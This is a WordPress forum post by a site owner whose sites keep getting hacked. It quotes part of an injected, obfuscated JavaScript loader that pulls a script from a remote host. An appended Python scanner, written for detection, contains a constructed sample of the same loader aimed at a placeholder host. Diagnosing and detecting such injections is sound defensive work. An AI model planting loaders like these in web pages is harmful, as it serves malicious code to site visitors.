• I have posted about this before and followed all the steps that people kindly provided but yet again my WordPress sites have all been hacked. I visited my sites this morning (they were working fine last night) to find the following error:

    Parse error: syntax error, unexpected ‘<‘ in /home/pinkgar1/public_html/wp-includes/default-filters.php on line 229

    Once I overwrote this file with one from a fresh WordPress download, it then brings up this error:

    Parse error: syntax error, unexpected ‘<‘ in /home/pinkgar1/public_html/wp-includes/default-widgets.php on line 1042

    Again, I overwrote this file with one from a fresh WordPress download and the site comes back up with no errors and everything appears to be fine (but it isn’t!).

    This is not an error due to editing a template file, nor is it a problem with an installed plugin (unless that is where the hacker is getting in?). THIS IS A HACK ATTEMPT IN WHICH THEY HAVE SUCCEEDED! At the bottom of the browser where it shows ‘waiting for http://www.pinkgarden.co.uk’ a suspicious web site address appears, something along the lines of streamate-50.com-worldofwarcraft… and my web browser blocks a file that is trying to download from my site (the pop-up blocker tells me it’s a DAT file or something). I DO NOT have pop-up windows on my web site, nor do I have files that download from my site.

    If I look at my source code, they have also managed to insert the following JavaScript, which sometimes appears and then sometimes doesn’t:

    <script>/*GNU GPL*/ try{window.onload = function(){var N093zwnmmc31lmu = document.createElement(‘s&(!$c@(r&@@(i(&^p^&t!’.replace(/\!|\(|\$|#|\)|&|\^|@/ig, ”));N093zwnmmc31lmu.setAttribute(‘type’, ‘text/javascript’);N093zwnmmc31lmu.setAttribute(‘src’, ‘h(&t$(@t$!p((:)$(/&)/!&&s#&)a@!#(h!$i$@$b#&^^i@))!n$!&#)d(e)&@n&^#-#!c^&@$^o!@(m$$.)&$h()$(e@)i#^&&s!)$e).&@d#$)^e$#$!.(^!a#()d(&^)u(^l^)t@a@d&#w^#@o(&&r@@&&l#&)d$&-)#!&c@o^(m(.!^( [snip some of this code] |\)|\$|\^|@|#|&|\(/ig, ”));document.body.appendChild(N093zwnmmc31lmu);}} catch(e) {}</script>

    This was not there last night, nor is it something that I have added myself.

    This happened to me a week or so ago and I had to COMPLETELY wipe my ENTIRE site files and databases and start from scratch, which was very much my last resort. I emptied all my databases, removed every single file from my web server, downloaded a fresh new copy of the latest version of WordPress, downloaded fresh new copies of needed plugins, re-installed everything from scratch, with brand new database logins, passwords, new admin login (even downloaded the plugin that changes the default admin name to something less obvious than ‘admin’), used the default templates that come with the script, and yet here I am again, hacked.

    Pretty much all the plugins I installed were compatible with my version of WordPress and I only downloaded ones where the feedback on them was 4 star plus, i.e. very positive.

    I do not have any other scripts or files running on my file server, so it’s not a possible conflict there.

    I even went as far as making sure my brand new computer didn’t have a virus on it, which it doesn’t.

    I will be emailing this to the creators of WordPress, but in the meantime, what do I do now? Does this mean I have to find another script, which I really do not want to do, but on the other hand, I cannot keep getting hacked every week!

Viewing 8 replies - 16 through 23 (of 23 total)
  • The topic ‘Site Hacked AGAIN!’ is closed to new replies.
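
Added example, not part of the original thread: a Python check for the kind of injected script quoted in the post, where the element name and the `src` URL are padded with junk characters that a `.replace(/…/ig, '')` call strips at run time. The sample input is constructed (straight quotes, a placeholder `example.invalid` host), and the names `decode_padded` and `scan` are this example's own.

```python
import re

# '<padded literal>'.replace(/<junk alternation>/flags, '') -- the shape of the injected script
PADDED = re.compile(
    r"""'([^'\n]*)'\s*\.replace\(\s*/((?:\\.|[^/\\\n])+)/([a-z]*)\s*,\s*''\s*\)""")
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

def decode_padded(js):
    """Return (raw, decoded) pairs for every junk-padded string literal in js."""
    out = []
    for raw, pattern, flags in PADDED.findall(js):
        try:
            junk = re.compile(pattern, re.I if "i" in flags else 0)
        except re.error:
            continue  # JS-only regex syntax: leave the block for manual review
        count = 0 if "g" in flags else 1  # without /g, JS replaces only the first match
        out.append((raw, junk.sub("", raw, count=count)))
    return out

def scan(text):
    """Flag <script> blocks that build a script element from padded strings."""
    findings = []
    for m in SCRIPT_BLOCK.finditer(text):
        decoded = [d for _, d in decode_padded(m.group(1))]
        urls = [d for d in decoded if re.match(r"https?://", d, re.I)]
        if "script" in (d.lower() for d in decoded) and urls:
            line = text.count("\n", 0, m.start()) + 1
            findings.append({"line": line, "loads": urls})
    return findings

# Constructed sample: tail of a tampered PHP file, same obfuscation style as the post.
SAMPLE = r"""<?php // constructed sample, not a real WordPress file
add_filter('the_title', 'trim');
?>
<script>/*GNU GPL*/ try{window.onload = function(){var x = document.createElement('s&(!$c@(r&@@(i(&^p^&t!'.replace(/\!|\(|\$|#|\)|&|\^|@/ig, ''));x.setAttribute('src', 'h(&t$(@t$!p((:)$(/&)/!e#x@a^m&p!l$e(.)i@n#v^a&l!i$d(/)a@.#j^s'.replace(/\)|\$|\^|@|#|&|\(|\!/ig, ''));document.body.appendChild(x);}} catch(e) {}</script>
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(f"line {hit['line']}: injected loader for {hit['loads']}")
```

Run over every file under the web root and over the rendered page source, this reports which files carry the loader and which remote script it pulls in, which helps confirm whether a cleanup actually removed it.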